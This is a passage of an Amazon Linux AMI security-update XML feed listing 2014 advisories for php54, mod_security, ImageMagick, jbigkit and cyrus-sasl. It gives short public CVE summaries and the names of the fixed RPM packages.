release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-mssql-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-bcmath" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-bcmath-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-common" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-common-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-devel" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-devel-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-ldap" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-ldap-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-snmp" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-snmp-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-pdo" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pdo-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-xmlrpc" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-xmlrpc-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-tidy" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-tidy-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-gmp" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-gmp-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-debuginfo" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-debuginfo-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-recode" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-recode-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-pgsql" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pgsql-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-enchant" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-enchant-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-soap" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-soap-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-pspell" version="5.5.11" release="1.71.amzn1" epoch="0" arch="x86_64"><filename>Packages/php55-pspell-5.5.11-1.71.amzn1.x86_64.rpm</filename></package><package name="php55-cli" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-pspell" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pspell-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-mysqlnd" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mysqlnd-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-common-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-embedded" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-embedded-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-imap" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-imap-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-dba" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-dba-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-xml" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xml-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-enchant-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-odbc" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-odbc-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-xmlrpc" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-xmlrpc-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.11-1.71.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.11" release="1.71.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.11-1.71.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-333</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-333: medium priority package update for php54</title><issued date="2014-04-25 16:04:00" /><updated date="2014-09-18 00:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-7345:
The BEGIN regular expression in the awk script detector in magic/Magdir/commands in file before 5.15 uses multiple wildcards with unlimited repetitions, which allows context-dependent attackers to cause a denial of service (CPU consumption) via a crafted ASCII file that triggers a large amount of backtracking, as demonstrated via a file with many newline characters.
1079846:
CVE-2013-7345 file: extensive backtracking in awk rule regular expression
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-7345" title="" id="CVE-2013-7345" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54-odbc" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-odbc-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.27" release="1.53.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.27-1.53.amzn1.x86_64.rpm</filename></package><package name="php54-ldap" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-pdo" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-mysql" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-snmp" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.27-1.53.amzn1.i686.rpm</filename></package><package name="php54-tidy" version="5.4.27" release="1.53.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.27-1.53.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-334</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-334: medium priority package update for mod24_security</title><issued date="2014-05-06 22:19:00" /><updated date="2014-09-18 00:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-5705:
apache2/modsecurity.c in ModSecurity before 2.7.6 allows remote attackers to bypass rules by using chunked transfer coding with a capitalized Chunked value in the Transfer-Encoding HTTP header.
1082904:
CVE-2013-5705 mod_security: bypass of intended rules via chunked requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5705" title="" id="CVE-2013-5705" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod24_security" version="2.7.3" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_security-2.7.3-3.24.amzn1.x86_64.rpm</filename></package><package name="mlogc24" version="2.7.3" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mlogc24-2.7.3-3.24.amzn1.x86_64.rpm</filename></package><package name="mod24_security-debuginfo" version="2.7.3" release="3.24.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod24_security-debuginfo-2.7.3-3.24.amzn1.x86_64.rpm</filename></package><package name="mod24_security-debuginfo" version="2.7.3" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_security-debuginfo-2.7.3-3.24.amzn1.i686.rpm</filename></package><package name="mod24_security" version="2.7.3" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/mod24_security-2.7.3-3.24.amzn1.i686.rpm</filename></package><package name="mlogc24" version="2.7.3" release="3.24.amzn1" epoch="0" arch="i686"><filename>Packages/mlogc24-2.7.3-3.24.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-335</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-335: medium priority package update for mod_security</title><issued date="2014-05-06 22:19:00" /><updated date="2014-09-18 00:32:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-5705:
apache2/modsecurity.c in ModSecurity before 2.7.6 allows remote attackers to bypass rules by using chunked transfer coding with a capitalized Chunked value in the Transfer-Encoding HTTP header.
1082904:
CVE-2013-5705 mod_security: bypass of intended rules via chunked requests
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-5705" title="" id="CVE-2013-5705" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="mod_security" version="2.7.3" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_security-2.7.3-3.23.amzn1.x86_64.rpm</filename></package><package name="mlogc" version="2.7.3" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mlogc-2.7.3-3.23.amzn1.x86_64.rpm</filename></package><package name="mod_security-debuginfo" version="2.7.3" release="3.23.amzn1" epoch="0" arch="x86_64"><filename>Packages/mod_security-debuginfo-2.7.3-3.23.amzn1.x86_64.rpm</filename></package><package name="mlogc" version="2.7.3" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/mlogc-2.7.3-3.23.amzn1.i686.rpm</filename></package><package name="mod_security" version="2.7.3" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/mod_security-2.7.3-3.23.amzn1.i686.rpm</filename></package><package name="mod_security-debuginfo" version="2.7.3" release="3.23.amzn1" epoch="0" arch="i686"><filename>Packages/mod_security-debuginfo-2.7.3-3.23.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-336</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-336: medium priority package update for ImageMagick</title><issued date="2014-05-13 14:03:00" /><updated date="2014-09-18 00:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-2030:
1083477:
CVE-2014-2030 ImageMagick: PSD writing layer name buffer overflow ("L%06ld")
CVE-2014-1958:
1067276:
CVE-2014-1958 ImageMagick: buffer overflow flaw when handling PSD images that use RLE encoding
CVE-2014-1947:
1064098:
CVE-2014-1947 ImageMagick: PSD writing layer name buffer overflow ("L%02ld")
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1947" title="" id="CVE-2014-1947" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-1958" title="" id="CVE-2014-1958" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-2030" title="" id="CVE-2014-2030" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="ImageMagick-c++-devel" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-devel-6.7.8.9-10.15.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-debuginfo-6.7.8.9-10.15.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-devel" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-devel-6.7.8.9-10.15.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-perl" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-perl-6.7.8.9-10.15.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-doc" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-doc-6.7.8.9-10.15.amzn1.x86_64.rpm</filename></package><package name="ImageMagick-c++" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-c++-6.7.8.9-10.15.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="x86_64"><filename>Packages/ImageMagick-6.7.8.9-10.15.amzn1.x86_64.rpm</filename></package><package name="ImageMagick" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-6.7.8.9-10.15.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++-devel" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-devel-6.7.8.9-10.15.amzn1.i686.rpm</filename></package><package name="ImageMagick-devel" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-devel-6.7.8.9-10.15.amzn1.i686.rpm</filename></package><package name="ImageMagick-debuginfo" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-debuginfo-6.7.8.9-10.15.amzn1.i686.rpm</filename></package><package name="ImageMagick-doc" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-doc-6.7.8.9-10.15.amzn1.i686.rpm</filename></package><package name="ImageMagick-c++" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-c++-6.7.8.9-10.15.amzn1.i686.rpm</filename></package><package name="ImageMagick-perl" version="6.7.8.9" release="10.15.amzn1" epoch="0" arch="i686"><filename>Packages/ImageMagick-perl-6.7.8.9-10.15.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-337</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-337: medium priority package update for jbigkit</title><issued date="2014-05-13 16:23:00" /><updated date="2014-09-18 00:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-6369:
Stack-based buffer overflow in the jbg_dec_in function in libjbig/jbig.c in JBIG-KIT before 2.1 allows remote attackers to cause a denial of service (application crash) and possibly execute arbitrary code via a crafted image file.
1032273:
CVE-2013-6369 jbigkit: stack-based buffer overflow flaw
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-6369" title="" id="CVE-2013-6369" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="jbigkit" version="2.0" release="11.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/jbigkit-2.0-11.4.amzn1.x86_64.rpm</filename></package><package name="jbigkit-devel" version="2.0" release="11.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/jbigkit-devel-2.0-11.4.amzn1.x86_64.rpm</filename></package><package name="jbigkit-debuginfo" version="2.0" release="11.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/jbigkit-debuginfo-2.0-11.4.amzn1.x86_64.rpm</filename></package><package name="jbigkit-libs" version="2.0" release="11.4.amzn1" epoch="0" arch="x86_64"><filename>Packages/jbigkit-libs-2.0-11.4.amzn1.x86_64.rpm</filename></package><package name="jbigkit-debuginfo" version="2.0" release="11.4.amzn1" epoch="0" arch="i686"><filename>Packages/jbigkit-debuginfo-2.0-11.4.amzn1.i686.rpm</filename></package><package name="jbigkit-libs" version="2.0" release="11.4.amzn1" epoch="0" arch="i686"><filename>Packages/jbigkit-libs-2.0-11.4.amzn1.i686.rpm</filename></package><package name="jbigkit" version="2.0" release="11.4.amzn1" epoch="0" arch="i686"><filename>Packages/jbigkit-2.0-11.4.amzn1.i686.rpm</filename></package><package name="jbigkit-devel" version="2.0" release="11.4.amzn1" epoch="0" arch="i686"><filename>Packages/jbigkit-devel-2.0-11.4.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2014-338</id><title>Amazon Linux AMI 2012.09 - ALAS-2014-338: medium priority package update for cyrus-sasl</title><issued date="2014-05-13 16:37:00" /><updated date="2014-09-18 00:34:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2013-4122:
Cyrus SASL 2.1.23, 2.1.26, and earlier does not properly handle when a NULL value is returned upon an error by the crypt function as implemented in glibc 2.17 and later, which allows remote attackers to cause a denial of service (thread crash and consumption) via (1) an invalid salt or, when FIPS-140 is enabled, a (2) DES or (3) MD5 encrypted password, which triggers a NULL pointer dereference.
984669:
CVE-2013-4122 cyrus-sasl: NULL pointer dereference (DoS) when glibc v.2.17 or FIPS-140 enabled Linux system used
